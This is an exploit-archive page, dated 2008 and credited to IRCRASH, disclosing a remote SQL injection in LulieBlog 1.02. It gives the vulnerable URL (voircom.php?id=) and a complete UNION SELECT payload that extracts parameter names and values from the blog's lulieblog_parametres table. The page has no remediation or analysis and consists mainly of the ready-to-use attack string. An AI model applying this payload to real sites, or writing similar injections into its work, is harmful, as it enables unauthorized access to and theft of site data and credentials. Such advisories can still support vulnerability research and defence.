LulieBlog 1.02 (voircom.php id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : LulieBlog 1.02 (voircom.php id) Remote SQL Injection Vulnerability
# Published : 2008-01-23
# Author : IRCRASH
# Previous Title : Foojan WMS 1.0 (index.php story) Remote SQL Injection Vulnerability
# Next Title : Web Wiz Forums <= 9.07 (sub) Remote Directory Traversal Vulnerability

#####################################################################################
####              LulieBlog Version 1.02 Remote Sql Injection                    ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://sourceforge.net/project/platformdownload.php?group_id=204083
#                                                                                   #
#Injection Adress :  http://Sitename/voircom.php?id=[SQL CODE]                      #
#                                                                                   #
#                                                                                   #
#[SQL CODE] : -1%27union/**/select/**/0,concat(nom_parametre,0x3a,0x3a,valeur_parametre),2,3,4,5/**/from/**/lulieblog_parametres/*
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# www.Syue.com [2008-01-23]